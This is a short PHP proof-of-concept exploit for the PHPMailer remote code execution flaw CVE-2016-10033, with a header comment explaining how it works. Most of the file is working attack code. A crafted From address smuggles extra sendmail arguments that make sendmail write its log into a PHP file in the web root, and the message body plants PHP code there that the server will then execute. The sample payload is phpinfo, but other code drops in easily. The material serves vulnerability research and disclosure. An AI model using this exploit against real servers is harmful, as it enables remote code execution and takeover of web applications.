<?php
/*
PHPMailer <5.2.18 Remote Code Execution (CVE-2016-10033)
Discovered/Coded by:
Dawid Golunski (@dawid_golunski)
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no.0==[/usr/sbin/sendmail]
Arg no.1==[-t]
Arg no.2==[-i]
Arg no.3==[-fattacker\]
Arg no.4==[-oQ/tmp/]
Arg no.5==[-X/var/www/cache/phpcode.php]
Arg no.6==[some"@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
The resulting file will contain the payload passed in the body of the msg:09607<<<--b1_cb4566aa51be9f090d9419163e492306
09607<<< Content-Type: text/html; charset=us-ascii09607<<<09607<<<<?php phpinfo(); ?>09607<<<09607<<<09607<<<09607<<<--b1_cb4566aa51be9f090d9419163e492306--
See the full advisory URL for details.*/// Attacker's input coming from untrusted source such as $_GET , $_POST etc.// For example from a Contact form
$email_from ='"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.phpsome"@email.com';
$msg_body="<?php phpinfo(); ?>";//------------------// mail() param injection via the vulnerability in PHPMailer
require_once('class.phpmailer.php');
$mail = new PHPMailer();// defaults to using php "mail()"
$mail->SetFrom($email_from,'Client Name');
$address ="customer_feedback@company-X.com";
$mail->AddAddress($address,"Some User");
$mail->Subject="PHPMailer PoC Exploit CVE-2016-10033";
$mail->MsgHTML($msg_body);if(!$mail->Send()){
echo "Mailer Error: ". $mail->ErrorInfo;}else{
echo "Message sent!\n";}
?>
